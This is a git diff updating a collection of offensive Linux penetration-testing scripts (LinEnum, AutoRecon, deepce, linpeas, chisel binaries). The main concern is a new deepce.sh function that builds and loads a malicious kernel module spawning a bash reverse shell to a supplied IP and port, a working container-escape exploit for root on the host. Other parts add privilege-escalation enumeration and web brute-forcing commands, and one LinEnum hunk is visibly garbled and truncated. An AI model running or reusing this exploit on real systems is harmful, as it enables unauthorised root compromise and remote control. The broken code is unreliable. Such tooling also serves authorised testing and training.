diff --git a/LinEnum.sh b/LinEnum.sh index a5aea9d..d8c69f2 100755 --- a/LinEnum.sh +++ b/LinEnum.sh @@ -1,6 +1,6 @@ #!/bin/bash #A script to enumerate local information from a Linux host -version="version 0.98" +version="version 0.982" #@rebootuser #help function @@ -375,7 +375,9 @@ fi #current path configuration pathinfo=`echo $PATH 2>/dev/null` if [ "$pathinfo" ]; then + pathswriteable=`ls -ld $(echo $PATH | tr ":" " ")` echo -e "\e[00;31m[-] Path information:\e[00m\n$pathinfo" + echo -e "$pathswriteable" echo -e "\n" fi @@ -737,25 +739,25 @@ if [ "$postgver" ]; then fi #checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this -postcon1=`psql -U postgres template0 -c 'select version()' 2>/dev/null | grep version` +postcon1=`psql -U postgres -w template0 -c 'select version()' 2>/dev/null | grep version` if [ "$postcon1" ]; then echo -e "\e[00;33m[+] We can connect to Postgres DB 'template0' as user 'postgres' with no password!:\e[00m\n$postcon1" echo -e "\n" fi -postcon11=`psql -U postgres template1 -c 'select version()' 2>/dev/null | grep version` +postcon11=`psql -U postgres -w template1 -c 'select version()' 2>/dev/null | grep version` if [ "$postcon11" ]; then echo -e "\e[00;33m[+] We can connect to Postgres DB 'template1' as user 'postgres' with no password!:\e[00m\n$postcon11" echo -e "\n" fi -postcon2=`psql -U pgsql template0 -c 'select version()' 2>/dev/null | grep version` +postcon2=`psql -U pgsql -w template0 -c 'select version()' 2>/dev/null | grep version` if [ "$postcon2" ]; then echo -e "\e[00;33m[+] We can connect to Postgres DB 'template0' as user 'psql' with no password!:\e[00m\n$postcon2" echo -e "\n" fi -postcon22=`psql -U pgsql template1 -c 'select version()' 2>/dev/null | grep version` +postcon22=`psql -U pgsql -w template1 -c 'select version()' 2>/dev/null | grep version` if [ "$postcon22" ]; then echo -e "\e[00;33m[+] We can connect to Postgres DB 'template1' as user 'psql' with no password!:\e[00m\n$postcon22" echo -e "\n" @@ -825,7 +827,8 @@ echo -e "\e[00;31m[-] Can we read/write sensitive files:\e[00m" ; ls -la /etc/pa echo -e "\n" #search for suid files -findsuid=`find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;` +allsuid=`find / -perm -4000 -type f 2>/dev/null` +findsuid=`find $allsuid -perm -4000 -type f -exec ls -la {} 2>/dev/null \;` if [ "$findsuid" ]; then echo -e "\e[00;31m[-] SUID files:\e[00m\n$findsuid" echo -e "\n" @@ -837,28 +840,29 @@ if [ "$export" ] && [ "$findsuid" ]; then fi #list of 'interesting' suid files - feel free to make additions -intsuid=`find / -perm -4000 -type f -exec ls -la {} \; 2>/dev/null | grep -w $binarylist 2>/dev/null` +intsuid=`find $allsuid -perm -4000 -type f -exec ls -la {} \; 2>/dev/null | grep -w $binarylist 2>/dev/null` if [ "$intsuid" ]; then echo -e "\e[00;33m[+] Possibly interesting SUID files:\e[00m\n$intsuid" echo -e "\n" fi -#lists word-writable suid files -wwsuid=`find / -perm -4002 -type f -exec ls -la {} 2>/dev/null \;` +#lists world-writable suid files +wwsuid=`find $allsuid -perm -4002 -type f -exec ls -la {} 2>/dev/null \;` if [ "$wwsuid" ]; then echo -e "\e[00;33m[+] World-writable SUID files:\e[00m\n$wwsuid" echo -e "\n" fi #lists world-writable suid files owned by root -wwsuidrt=`find / -uid 0 -perm -4002 -type f -exec ls -la {} 2>/dev/null \;` +wwsuidrt=`find $allsuid -uid 0 -perm -4002 -type f -exec ls -la {} 2>/dev/null \;` if [ "$wwsuidrt" ]; then echo -e "\e[00;33m[+] World-writable SUID files owned by root:\e[00m\n$wwsuidrt" echo -e "\n" fi #search for sgid files -findsgid=`find / -perm -2000 -type f -exec ls -la {} 2>/dev/null \;` +allsgid=`find / -perm -2000 -type f 2>/dev/null` +findsgid=`find $allsgid -perm -2000 -type f -exec ls -la {} 2>/dev/null \;` if [ "$findsgid" ]; then echo -e "\e[00;31m[-] SGID files:\e[00m\n$findsgid" echo -e "\n" @@ -870,21 +874,21 @@ if [ "$export" ] && [ "$findsgid" ]; then fi #list of 'interesting' sgid files -intsgid=`find / -perm -2000 -type f -exec ls -la {} \; 2>/dev/null | grep -w $binarylist 2>/dev/null` +intsgid=`find $allsgid -perm -2000 -type f -exec ls -la {} \; 2>/dev/null | grep -w $binarylist 2>/dev/null` if [ "$intsgid" ]; then echo -e "\e[00;33m[+] Possibly interesting SGID files:\e[00m\n$intsgid" echo -e "\n" fi #lists world-writable sgid files -wwsgid=`find / -perm -2002 -type f -exec ls -la {} 2>/dev/null \;` +wwsgid=`find $allsgid -perm -2002 -type f -exec ls -la {} 2>/dev/null \;` if [ "$wwsgid" ]; then echo -e "\e[00;33m[+] World-writable SGID files:\e[00m\n$wwsgid" echo -e "\n" fi #lists world-writable sgid files owned by root -wwsgidrt=`find / -uid 0 -perm -2002 -type f -exec ls -la {} 2>/dev/null \;` +wwsgidrt=`find $allsgid -uid 0 -perm -2002 -type f -exec ls -la {} 2>/dev/null \;` if [ "$wwsgidrt" ]; then echo -e "\e[00;33m[+] World-writable SGID files owned by root:\e[00m\n$wwsgidrt" echo -e "\n" @@ -1225,6 +1229,14 @@ if [ "$checkbashhist" ]; then echo -e "\n" fi +#any .bak files that may be of interest +bakfiles=`find / -name *.bak -type f 2/dev/null` if [ "$readmail" ]; then diff --git a/autorecon.py b/autorecon.py index 46ba5f2..5b4c07f 100644 --- a/autorecon.py +++ b/autorecon.py @@ -23,32 +23,103 @@ import sys import time import toml import termios +import appdirs +import shutil -def _quit(): - termios.tcsetattr(sys.stdin.fileno(), termios.TCSADRAIN, TERM_FLAGS) - -atexit.register(_quit) - -TERM_FLAGS = termios.tcgetattr(sys.stdin.fileno()) - +# Globals verbose = 0 -nmap = '-vv --reason -Pn' -srvname = '' +nmap = "-vv --reason -Pn" +srvname = "" heartbeat_interval = 60 port_scan_profile = None - port_scan_profiles_config = None service_scans_config = None global_patterns = [] - -username_wordlist = '/usr/share/seclists/Usernames/top-usernames-shortlist.txt' -password_wordlist = '/usr/share/seclists/Passwords/darkweb2017-top100.txt' - -rootdir = os.path.dirname(os.path.realpath(__file__)) - +username_wordlist = "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" +password_wordlist = "/usr/share/seclists/Passwords/darkweb2017-top100.txt" single_target = False only_scans_dir = False + +def _quit(): + TERM_FLAGS = termios.tcgetattr(sys.stdin.fileno()) + termios.tcsetattr(sys.stdin.fileno(), termios.TCSADRAIN, TERM_FLAGS) + + +def _init(): + global port_scan_profiles_config + global service_scans_config + global global_patterns + + atexit.register(_quit) + appname = "AutoRecon" + rootdir = os.path.dirname(os.path.realpath(__file__)) + default_config_dir = os.path.join(rootdir, "config") + config_dir = appdirs.user_config_dir(appname) + port_scan_profiles_config_file = os.path.join(config_dir, "port-scan-profiles.toml") + service_scans_config_file = os.path.join(config_dir, "service-scans.toml") + global_patterns_config_file = os.path.join(config_dir, "global-patterns.toml") + + # Confirm this directory exists; if not, populate it with the default configurations + if not os.path.exists(config_dir): + os.makedirs(config_dir, exist_ok=True) + shutil.copy( + os.path.join(default_config_dir, "port-scan-profiles-default.toml"), + port_scan_profiles_config_file, + ) + shutil.copy( + os.path.join(default_config_dir, "service-scans-default.toml"), + service_scans_config_file, + ) + shutil.copy( + os.path.join(default_config_dir, "global-patterns-default.toml"), + global_patterns_config_file, + ) + + + with open(port_scan_profiles_config_file, "r") as p: + try: + port_scan_profiles_config = toml.load(p) + + if len(port_scan_profiles_config) == 0: + fail( + "There do not appear to be any port scan profiles configured in the {port_scan_profiles_config_file} config file." + ) + + except toml.decoder.TomlDecodeError as e: + fail( + "Error: Couldn't parse {port_scan_profiles_config_file} config file. Check syntax and duplicate tags." + ) + + with open(service_scans_config_file, "r") as c: + try: + service_scans_config = toml.load(c) + except toml.decoder.TomlDecodeError as e: + fail( + "Error: Couldn't parse service-scans.toml config file. Check syntax and duplicate tags." + ) + + with open(global_patterns_config_file, "r") as p: + try: + global_patterns = toml.load(p) + if "pattern" in global_patterns: + global_patterns = global_patterns["pattern"] + else: + global_patterns = [] + except toml.decoder.TomlDecodeError as e: + fail( + "Error: Couldn't parse global-patterns.toml config file. Check syntax and duplicate tags." + ) + + if "username_wordlist" in service_scans_config: + if isinstance(service_scans_config["username_wordlist"], str): + username_wordlist = service_scans_config["username_wordlist"] + + if "password_wordlist" in service_scans_config: + if isinstance(service_scans_config["password_wordlist"], str): + password_wordlist = service_scans_config["password_wordlist"] + + def e(*args, frame_index=1, **kvargs): frame = sys._getframe(frame_index) @@ -146,40 +217,6 @@ def calculate_elapsed_time(start_time): return ', '.join(elapsed_time) -port_scan_profiles_config_file = 'port-scan-profiles.toml' -with open(os.path.join(rootdir, 'autorecon_config', port_scan_profiles_config_file), 'r') as p: - try: - port_scan_profiles_config = toml.load(p) - - if len(port_scan_profiles_config) == 0: - fail('There do not appear to be any port scan profiles configured in the {port_scan_profiles_config_file} config file.') - - except toml.decoder.TomlDecodeError as e: - fail('Error: Couldn\'t parse {port_scan_profiles_config_file} config file. Check syntax and duplicate tags.') - -with open(os.path.join(rootdir, 'autorecon_config', 'service-scans.toml'), 'r') as c: - try: - service_scans_config = toml.load(c) - except toml.decoder.TomlDecodeError as e: - fail('Error: Couldn\'t parse service-scans.toml config file. Check syntax and duplicate tags.') - -with open(os.path.join(rootdir, 'autorecon_config', 'global-patterns.toml'), 'r') as p: - try: - global_patterns = toml.load(p) - if 'pattern' in global_patterns: - global_patterns = global_patterns['pattern'] - else: - global_patterns = [] - except toml.decoder.TomlDecodeError as e: - fail('Error: Couldn\'t parse global-patterns.toml config file. Check syntax and duplicate tags.') - -if 'username_wordlist' in service_scans_config: - if isinstance(service_scans_config['username_wordlist'], str): - username_wordlist = service_scans_config['username_wordlist'] - -if 'password_wordlist' in service_scans_config: - if isinstance(service_scans_config['password_wordlist'], str): - password_wordlist = service_scans_config['password_wordlist'] async def read_stream(stream, target, tag='?', patterns=[], color=Fore.BLUE): address = target.address @@ -595,7 +632,7 @@ async def scan_services(loop, semaphore, target): pending.add(asyncio.ensure_future(run_cmd(semaphore, e(command), target, tag=tag, patterns=patterns))) -def scan_host(target, concurrent_scans): +def scan_host(target, concurrent_scans, outdir): start_time = time.time() info('Scanning target {byellow}{target.address}{rst}') @@ -655,8 +692,18 @@ class Target: self.lock = None self.running_tasks = [] -if __name__ == '__main__': + +def main(): + global single_target + global only_scans_dir + global port_scan_profile + global heartbeat_interval + global nmap + global srvname + global verbose + + _init() parser = argparse.ArgumentParser(description='Network reconnaissance tool to port scan and automatically enumerate services found on multiple targets.') parser.add_argument('targets', action='store', help='IP addresses (e.g. 10.0.0.1), CIDR notation (e.g. 10.0.0.1/24), or resolvable hostnames (e.g. foo.bar) to scan.', nargs="*") parser.add_argument('-t', '--targets', action='store', type=str, default='', dest='target_file', help='Read targets from file.') @@ -814,7 +861,7 @@ if __name__ == '__main__': for address in targets: target = Target(address) - futures.append(executor.submit(scan_host, target, concurrent_scans)) + futures.append(executor.submit(scan_host, target, concurrent_scans, outdir)) try: for future in as_completed(futures): @@ -827,3 +874,8 @@ if __name__ == '__main__': elapsed_time = calculate_elapsed_time(start_time) info('{bgreen}Finished scanning all targets in {elapsed_time}!{rst}') + + +if __name__ == '__main__': + main() + diff --git a/autorecon_config/service-scans.toml b/autorecon_config/service-scans.toml index 5210a94..f51fced 100644 --- a/autorecon_config/service-scans.toml +++ b/autorecon_config/service-scans.toml @@ -126,12 +126,21 @@ ignore-service-names = [ command = 'whatweb --color=never --no-errors -a 3 -v {scheme}://{address}:{port} 2>&1 | tee "{scandir}/{protocol}_{port}_{scheme}_whatweb.txt"' [[http.scan]] - name = 'nikto' - command = 'nikto -ask=no -h {scheme}://{address}:{port} 2>&1 | tee "{scandir}/{protocol}_{port}_{scheme}_nikto.txt"' + name = 'ffuf' + command = 'ffuf -u {scheme}://{address}:{port}/FUZZ -t 10 -w /usr/share/seclists/Discovery/Web-Content/common.txt -e ".txt,.html,.php,.asp,.aspx,.jsp" -v | tee {scandir}/{protocol}_{port}_{scheme}_ffuf.txt' - [[http.scan]] - name = 'gobuster' - command = 'if [[ `gobuster -h 2>&1 | grep -F "mode (dir)"` ]]; then gobuster -u {scheme}://{address}:{port}/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -e -k -l -s "200,204,301,302,307,401,403" -x "txt,html,php,asp,aspx,jsp" -o "{scandir}/{protocol}_{port}_{scheme}_gobuster.txt"; else gobuster dir -u {scheme}://{address}:{port}/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -z -k -l -x "txt,html,php,asp,aspx,jsp" -o "{scandir}/{protocol}_{port}_{scheme}_gobuster.txt"; fi' + [[http.manual]] + description = '(nikto) old but generally reliable web server enumeration tool' + commands = [ + 'nikto -ask=no -h {scheme}://{address}:{port} 2>&1 | tee "{scandir}/{protocol}_{port}_{scheme}_nikto.txt"' + ] + + [[http.manual]] + description = '(ffuf) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:' + commands = [ + 'ffuf -u {scheme}://{address}:{port}/FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt -e ".txt,.html,.php,.asp,.aspx,.jsp" -v | tee {scandir}/{protocol}_{port}_{scheme}_ffuf_big.txt', + 'ffuf -u {scheme}://{address}:{port}/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e ".txt,.html,.php,.asp,.aspx,.jsp" -v | tee {scandir}/{protocol}_{port}_{scheme}_ffuf_dirbuster.txt' + ] [[http.manual]] description = '(dirsearch) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:' diff --git a/chisel b/chisel index 022f030..575ff87 100755 Binary files a/chisel and b/chisel differ diff --git a/chisel64 b/chisel64 index 027667b..452fe8b 100755 Binary files a/chisel64 and b/chisel64 differ diff --git a/deepce.sh b/deepce.sh index 393b4e6..0a4b0a0 100755 --- a/deepce.sh +++ b/deepce.sh @@ -67,6 +67,7 @@ Usage: ${0##*/} [OPTIONS...] SOCK use an exposed docker sock to create a new container and mount root partition to priv esc CVE-2019-5746 CVE-2019-5021 + SYS_MODULE Exploit the SYS_MODULE privilege to create a malicious kernel module and obtain root on the host ${DG}[Payloads & Options]$NC -i, --ip The local host IP address for reverse shells to connect to @@ -125,6 +126,8 @@ TIP_CVE_2019_5021="Alpine linux version 3.3.x-3.5.x accidentally allow users to TIP_CVE_2019_13139="Docker versions before 18.09.4 are vulnerable to a command execution vulnerability when parsing URLs" TIP_CVE_2019_5736="Docker versions before 18.09.2 are vulnerable to a container escape by overwriting the runC binary" +TIP_SYS_MODULE="Giving the container the SYS_MODULE privilege allows for kernel modules to be mounted. Using this, a malicious module can be used to execute code as root on the host." + DANGEROUS_GROUPS="docker\|lxd\|root\|sudo\|wheel" DANGEROUS_CAPABILITIES="cap_sys_admin\|cap_sys_ptrace\|cap_sys_module\|dac_read_search\|dac_override" @@ -1112,6 +1115,112 @@ exploitDockerSock() { # TODO: Tidy up command } +exploitSysModule(){ + printSection "Exploiting SYS_MODULE" + printTip "$TIP_SYS_MODULE" + + if ! [ -x "$(command -v capsh)" ]; then + printError "capsh is required to run this exploit." + exit 1 + fi + + if ! [ -x "$(command -v make)" ]; then + printError "make is required to run this exploit." + exit 1 + fi + + if ! [ -x "$(command -v insmod)" ]; then + printError "insmod is required to run this exploit." + exit 1 + fi + + if ! [ -d "/lib/modules/$(uname -r)" ]; then + printError "Linux headers for $(uname -r) are required to run this exploit." + exit 1 + fi + + caps=$(capsh --print) + if ! echo "$caps" | grep -qa "cap_sys_module" ; then + printError "We don't have the SYS_MODULE capability, which is required for this exploit" + exit 1 + fi + + if [ -z "$ip" ]; then + printError "Missing reverse shell IP : use --ip" + exit 1 + fi + + if [ -z "$port" ]; then + printError "Missing reverse shell port : use --port" + exit 1 + fi + + module_name=$(tr -dc A-Za-z "$module_name.c" +#include +#include +MODULE_LICENSE("GPL"); +MODULE_AUTHOR("AttackDefense"); +MODULE_DESCRIPTION("LKM reverse shell module"); +MODULE_VERSION("1.0"); +char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/$ip/$port 0>&1", NULL}; +static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL }; +static int __init ${module_name}_init(void) { +return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC); +} +static void __exit ${module_name}_exit(void) { +} +module_init(${module_name}_init); +module_exit(${module_name}_exit); +EOF + +cat << EOF > Makefile +obj-m +=${module_name}.o +all: + make -C /lib/modules/$(uname -r)/build M=$(pwd) modules +clean: + make -C /lib/modules/$(uname -r)/build M=$(pwd) clean +EOF + + printSuccess "Done" + + printQuestion "Compiling kernel module..." + + if make 1>/dev/null ; then + printSuccess "Done" + else + printError "Failed to make. Do you have all the required libraries installed?" + exit 1 + fi + + printQuestion "Mounting kernel module..." + + if insmod "$module_name.ko" 1>/dev/null ; then + printSuccess "Done" + else + printError "Failed to mount module" + exit 1 + fi + + printQuestion "Cleaning up..." + + rm -r /dev/shm/rev + + cd "$sys_cwd" || exit + + printSuccess "Done" + + printSuccess "Check your reverse shell handler!" + +} + ########################################### #--------------) Arg Parse (--------------# ########################################### @@ -1246,6 +1355,9 @@ if [ "$exploit" ]; then sock | SOCK) exploitDockerSock ;; + sys | SYS | sys_module | SYS_MODULE) + exploitSysModule + ;; *) echo "Unknown exploit $1" exit 1 diff --git a/linpeas.sh b/linpeas.sh index 2a23629..b5978a9 100755 --- a/linpeas.sh +++ b/linpeas.sh @@ -1,6 +1,6 @@ #!/bin/sh -VERSION="v2.8.3" +VERSION="v3.1.5 - Safe OSCP" ADVISORY="This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission." ########################################### @@ -47,6 +47,10 @@ QUIET="" CHECKS="SysI,Devs,AvaSof,ProCronSrvcsTmrsSocks,Net,UsrI,SofI,IntFiles" WAIT="" PASSWORD="" +THREADS="`((grep -c processor /proc/cpuinfo 2>/dev/null) || ((command -v lscpu >/dev/null 2>&1) && (lscpu | grep '^CPU(s):' | awk '{print $2}')) || echo -n 2) | tr -d "\n"`" +[ -z "$THREADS" ] && THREADS="2" #If THREADS is empty, put number 2 +[ -n "$THREADS" ] && eTHREADS="2" #If THREADS is null, put number 2 +[ "$THREADS" -eq "$THREADS" ] 2>/dev/null && : || THREADS="2" #It THREADS is not a number, put number 2 HELP=$GREEN"Enumerate and search Privilege Escalation vectors. ${NC}This tool enum and search possible misconfigurations$DG (known vulns, user, processes and file permissions, special file permissions, readable/writable files, bruteforce other users(top1000pwds), passwords...)$NC inside the host and highlight possible misconfigurations with colors. $Y-h$B To show this message @@ -59,12 +63,13 @@ ${NC}This tool enum and search possible misconfigurations$DG (known vulns, user, $Y-o$B Only execute selected checks (SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles). Select a comma separated list. $Y-L$B Force linpeas execution. $Y-M$B Force macpeas execution. + $Y-t$B Threads to search files inside the system (by default it's the number of CPU threads). $Y-d $B Discover hosts using fping or ping.$DG Ex: -d 192.168.0.1/24 $Y-p -d $B Discover hosts looking for TCP open ports (via nc). By default ports 22,80,443,445,3389 and another one indicated by you will be scanned (select 22 if you don't want to add more). You can also add a list of ports.$DG Ex: -d 192.168.0.1/24 -p 53,139 $Y-i [-p ]$B Scan an IP using nc. By default (no -p), top1000 of nmap will be scanned, but you can select a list of ports instead.$DG Ex: -i 127.0.0.1 -p 53,80,443,8000,8080 $GREEN Notice$B that if you select some network action, no PE check will be performed\n\n$NC" -while getopts "h?asnd:p:i:P:qo:LMw" opt; do +while getopts "h?asnd:p:i:P:qo:LMwt:" opt; do case "$opt" in h|\?) printf "$HELP"$NC; exit 0;; a) FAST="";; @@ -79,283 +84,17 @@ while getopts "h?asnd:p:i:P:qo:LMw" opt; do L) MACPEAS="";; M) MACPEAS="1";; w) WAIT=1;; + t) THREADS=$OPTARG;; esac done if [ "$MACPEAS" ]; then SCRIPTNAME="macpeas"; else SCRIPTNAME="linpeas"; fi -printf " ${DG}Starting $SCRIPTNAME. Building blacklists...$NC" - -########################################### -#---------------) Lists (-----------------# -########################################### - -filename="$SCRIPTNAME.txt$RANDOM" -kernelB=" 4.0.[0-9]+| 4.1.[0-9]+| 4.2.[0-9]+| 4.3.[0-9]+| 4.4.[0-9]+| 4.5.[0-9]+| 4.6.[0-9]+| 4.7.[0-9]+| 4.8.[0-9]+| 4.9.[0-9]+| 4.10.[0-9]+| 4.11.[0-9]+| 4.12.[0-9]+| 4.13.[0-9]+| 3.9.6| 3.9.0| 3.9| 3.8.9| 3.8.8| 3.8.7| 3.8.6| 3.8.5| 3.8.4| 3.8.3| 3.8.2| 3.8.1| 3.8.0| 3.8| 3.7.6| 3.7.0| 3.7| 3.6.0| 3.6| 3.5.0| 3.5| 3.4.9| 3.4.8| 3.4.6| 3.4.5| 3.4.4| 3.4.3| 3.4.2| 3.4.1| 3.4.0| 3.4| 3.3| 3.2| 3.19.0| 3.16.0| 3.15| 3.14| 3.13.1| 3.13.0| 3.13| 3.12.0| 3.12| 3.11.0| 3.11| 3.10.6| 3.10.0| 3.10| 3.1.0| 3.0.6| 3.0.5| 3.0.4| 3.0.3| 3.0.2| 3.0.1| 3.0.0| 2.6.9| 2.6.8| 2.6.7| 2.6.6| 2.6.5| 2.6.4| 2.6.39| 2.6.38| 2.6.37| 2.6.36| 2.6.35| 2.6.34| 2.6.33| 2.6.32| 2.6.31| 2.6.30| 2.6.3| 2.6.29| 2.6.28| 2.6.27| 2.6.26| 2.6.25| 2.6.24.1| 2.6.24| 2.6.23| 2.6.22| 2.6.21| 2.6.20| 2.6.2| 2.6.19| 2.6.18| 2.6.17| 2.6.16| 2.6.15| 2.6.14| 2.6.13| 2.6.12| 2.6.11| 2.6.10| 2.6.1| 2.6.0| 2.4.9| 2.4.8| 2.4.7| 2.4.6| 2.4.5| 2.4.4| 2.4.37| 2.4.36| 2.4.35| 2.4.34| 2.4.33| 2.4.32| 2.4.31| 2.4.30| 2.4.29| 2.4.28| 2.4.27| 2.4.26| 2.4.25| 2.4.24| 2.4.23| 2.4.22| 2.4.21| 2.4.20| 2.4.19| 2.4.18| 2.4.17| 2.4.16| 2.4.15| 2.4.14| 2.4.13| 2.4.12| 2.4.11| 2.4.10| 2.2.24" -kernelDCW_Ubuntu_Precise_1="3.1.1-1400-linaro-lt-mx5|3.11.0-13-generic|3.11.0-14-generic|3.11.0-15-generic|3.11.0-17-generic|3.11.0-18-generic|3.11.0-20-generic|3.11.0-22-generic|3.11.0-23-generic|3.11.0-24-generic|3.11.0-26-generic|3.13.0-100-generic|3.13.0-24-generic|3.13.0-27-generic|3.13.0-29-generic|3.13.0-30-generic|3.13.0-32-generic|3.13.0-33-generic|3.13.0-34-generic|3.13.0-35-generic|3.13.0-36-generic|3.13.0-37-generic|3.13.0-39-generic|3.13.0-40-generic|3.13.0-41-generic|3.13.0-43-generic|3.13.0-44-generic|3.13.0-46-generic|3.13.0-48-generic|3.13.0-49-generic|3.13.0-51-generic|3.13.0-52-generic|3.13.0-53-generic|3.13.0-54-generic|3.13.0-55-generic|3.13.0-57-generic|3.13.0-58-generic|3.13.0-59-generic|3.13.0-61-generic|3.13.0-62-generic|3.13.0-63-generic|3.13.0-65-generic|3.13.0-66-generic|3.13.0-67-generic|3.13.0-68-generic|3.13.0-71-generic|3.13.0-73-generic|3.13.0-74-generic|3.13.0-76-generic|3.13.0-77-generic|3.13.0-79-generic|3.13.0-83-generic|3.13.0-85-generic|3.13.0-86-generic|3.13.0-88-generic|3.13.0-91-generic|3.13.0-92-generic|3.13.0-93-generic|3.13.0-95-generic|3.13.0-96-generic|3.13.0-98-generic|3.2.0-101-generic|3.2.0-101-generic-pae|3.2.0-101-virtual|3.2.0-102-generic|3.2.0-102-generic-pae|3.2.0-102-virtual" -kernelDCW_Ubuntu_Precise_2="3.2.0-104-generic|3.2.0-104-generic-pae|3.2.0-104-virtual|3.2.0-105-generic|3.2.0-105-generic-pae|3.2.0-105-virtual|3.2.0-106-generic|3.2.0-106-generic-pae|3.2.0-106-virtual|3.2.0-107-generic|3.2.0-107-generic-pae|3.2.0-107-virtual|3.2.0-109-generic|3.2.0-109-generic-pae|3.2.0-109-virtual|3.2.0-110-generic|3.2.0-110-generic-pae|3.2.0-110-virtual|3.2.0-111-generic|3.2.0-111-generic-pae|3.2.0-111-virtual|3.2.0-1412-omap4|3.2.0-1602-armadaxp|3.2.0-23-generic|3.2.0-23-generic-pae|3.2.0-23-lowlatency|3.2.0-23-lowlatency-pae|3.2.0-23-omap|3.2.0-23-powerpc-smp|3.2.0-23-powerpc64-smp|3.2.0-23-virtual|3.2.0-24-generic|3.2.0-24-generic-pae|3.2.0-24-virtual|3.2.0-25-generic|3.2.0-25-generic-pae|3.2.0-25-virtual|3.2.0-26-generic|3.2.0-26-generic-pae|3.2.0-26-virtual|3.2.0-27-generic|3.2.0-27-generic-pae|3.2.0-27-virtual|3.2.0-29-generic|3.2.0-29-generic-pae|3.2.0-29-virtual|3.2.0-31-generic|3.2.0-31-generic-pae|3.2.0-31-virtual|3.2.0-32-generic|3.2.0-32-generic-pae|3.2.0-32-virtual|3.2.0-33-generic|3.2.0-33-generic-pae|3.2.0-33-lowlatency|3.2.0-33-lowlatency-pae|3.2.0-33-virtual|3.2.0-34-generic|3.2.0-34-generic-pae|3.2.0-34-virtual|3.2.0-35-generic|3.2.0-35-generic-pae|3.2.0-35-lowlatency|3.2.0-35-lowlatency-pae|3.2.0-35-virtual" -kernelDCW_Ubuntu_Precise_3="3.2.0-36-generic|3.2.0-36-generic-pae|3.2.0-36-lowlatency|3.2.0-36-lowlatency-pae|3.2.0-36-virtual|3.2.0-37-generic|3.2.0-37-generic-pae|3.2.0-37-lowlatency|3.2.0-37-lowlatency-pae|3.2.0-37-virtual|3.2.0-38-generic|3.2.0-38-generic-pae|3.2.0-38-lowlatency|3.2.0-38-lowlatency-pae|3.2.0-38-virtual|3.2.0-39-generic|3.2.0-39-generic-pae|3.2.0-39-lowlatency|3.2.0-39-lowlatency-pae|3.2.0-39-virtual|3.2.0-40-generic|3.2.0-40-generic-pae|3.2.0-40-lowlatency|3.2.0-40-lowlatency-pae|3.2.0-40-virtual|3.2.0-41-generic|3.2.0-41-generic-pae|3.2.0-41-lowlatency|3.2.0-41-lowlatency-pae|3.2.0-41-virtual|3.2.0-43-generic|3.2.0-43-generic-pae|3.2.0-43-virtual|3.2.0-44-generic|3.2.0-44-generic-pae|3.2.0-44-lowlatency|3.2.0-44-lowlatency-pae|3.2.0-44-virtual|3.2.0-45-generic|3.2.0-45-generic-pae|3.2.0-45-virtual|3.2.0-48-generic|3.2.0-48-generic-pae|3.2.0-48-lowlatency|3.2.0-48-lowlatency-pae|3.2.0-48-virtual|3.2.0-51-generic|3.2.0-51-generic-pae|3.2.0-51-lowlatency|3.2.0-51-lowlatency-pae|3.2.0-51-virtual|3.2.0-52-generic|3.2.0-52-generic-pae|3.2.0-52-lowlatency|3.2.0-52-lowlatency-pae|3.2.0-52-virtual|3.2.0-53-generic" -kernelDCW_Ubuntu_Precise_4="3.2.0-53-generic-pae|3.2.0-53-lowlatency|3.2.0-53-lowlatency-pae|3.2.0-53-virtual|3.2.0-54-generic|3.2.0-54-generic-pae|3.2.0-54-lowlatency|3.2.0-54-lowlatency-pae|3.2.0-54-virtual|3.2.0-55-generic|3.2.0-55-generic-pae|3.2.0-55-lowlatency|3.2.0-55-lowlatency-pae|3.2.0-55-virtual|3.2.0-56-generic|3.2.0-56-generic-pae|3.2.0-56-lowlatency|3.2.0-56-lowlatency-pae|3.2.0-56-virtual|3.2.0-57-generic|3.2.0-57-generic-pae|3.2.0-57-lowlatency|3.2.0-57-lowlatency-pae|3.2.0-57-virtual|3.2.0-58-generic|3.2.0-58-generic-pae|3.2.0-58-lowlatency|3.2.0-58-lowlatency-pae|3.2.0-58-virtual|3.2.0-59-generic|3.2.0-59-generic-pae|3.2.0-59-lowlatency|3.2.0-59-lowlatency-pae|3.2.0-59-virtual|3.2.0-60-generic|3.2.0-60-generic-pae|3.2.0-60-lowlatency|3.2.0-60-lowlatency-pae|3.2.0-60-virtual|3.2.0-61-generic|3.2.0-61-generic-pae|3.2.0-61-virtual|3.2.0-63-generic|3.2.0-63-generic-pae|3.2.0-63-lowlatency|3.2.0-63-lowlatency-pae|3.2.0-63-virtual|3.2.0-64-generic|3.2.0-64-generic-pae|3.2.0-64-lowlatency|3.2.0-64-lowlatency-pae|3.2.0-64-virtual|3.2.0-65-generic|3.2.0-65-generic-pae|3.2.0-65-lowlatency|3.2.0-65-lowlatency-pae|3.2.0-65-virtual|3.2.0-67-generic|3.2.0-67-generic-pae|3.2.0-67-lowlatency|3.2.0-67-lowlatency-pae|3.2.0-67-virtual|3.2.0-68-generic" 